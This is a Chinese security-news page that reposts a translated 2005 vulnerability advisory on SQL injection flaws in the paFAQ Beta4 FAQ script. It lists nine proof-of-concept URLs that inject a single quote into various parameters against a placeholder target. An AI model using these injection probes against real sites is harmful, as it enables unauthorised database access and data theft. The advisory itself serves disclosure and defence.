| 网站首页 | 新闻中心 | 系统安全 | 网络安全 | 安全技术 | 下载中心 | 
课件制作网.
收藏本站
设为首页
安全365
paFAQ输入合法性漏洞导致SQL注入攻击
paFAQ输入合法性漏洞导致SQL注入攻击
作者:佚名 文章来源:不详 点击数: 更新时间:2007-1-25 10:53:05
本文作者: Z.C.Y[B.C.T]
文章出处: 原创翻译
阅读次数: 35
发布日期: 2005-2-19
翻译;Z.C.Y[B.C.T]
翻译网站:HTTP://WWW.BNSO.NET/
安全警告ID:1013232
资料来源:http://securitytracker.com/id?1013232
CVE 参考:http://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH
发布日期:2005-2-18
发布作者:Pi3cH of PersianHacker.NET Security Team
漏洞影响:泄露系统信息,泄露用户信息,用户操作
含有利用方法:是
影响版本:Beta4

描述:几处输入合法性漏洞存在于paFAQ。远程用户可以注入SQL指令。
几个脚本对用户提交给某些参数的输入值并没有验证完全。其中'question.php', 'answer.php', 'search.php', 和 'comment.php'
脚本受到影响。远程用户可以提交一个精心构造地址在存在的数据库中执行任意的SQL指令。

提供如下利用方法:
http://[target]/index.php?act=Question&id=1&limit=10&orderby=q_id&order=DESC&offset='
http://[ta rget]/index.php?act=Question&id=1&orderby=q_id&order=DESC&limit='
http://[target]/index.php?act=Question&id=1&orderby=q_id&order='&limit=10
http://[target]/index.php?ac t=Question&id=1&orderby='&order=DESC&limit=10
http://[target]/index.php?act=Answer&cid=1&id=1&offset='
http://[target]/index.php?act=Search&code=01&search_item='
http: //[target]/index.php?act=Speak&code=05&poster=1&name=2&question=3&email=4&cat_id='
http://[target]/index.php?act=Speak&code=02&cid='&id=1&poster=1&name=2&answer=3&email= 4
http://[target]/index.php?act=Speak&code=02&cid=1&id='&poster=1&name=2&answer=3&email=4

漏洞影响:远程用户可以执行任意SQL指令
解决方法:目前没有官方补丁
官方地址:http://www.phparena.net/pafaq.php
漏洞起因:输入合法性错误
影响系统:所有的Linux, UNIX

【转自世纪安全网 http://www.21safe.com】
新闻录入:admin    责任编辑:admin 
  • 上一篇新闻:

  • 下一篇新闻:
  • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
      网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
     
     
     
    McAfee炮轰微软 安全不是
    McAfee炮轰微软 安全不是
    Apache Mod_Auth_Kerb单
    Microsoft Windows Medi
    Mozilla Firefox/SeaMon
    Panda ActiveScan Activ
    Comdev One Admin Pro p
    Passgo SSO Plus本地不安
    Haru Free PDF Library 
    Site News page参数远程

    Copyright © 2006-2008 www.anquan365.com 安全365
    建议使用1024*768分辨率及第三方浏览器对本站进行浏览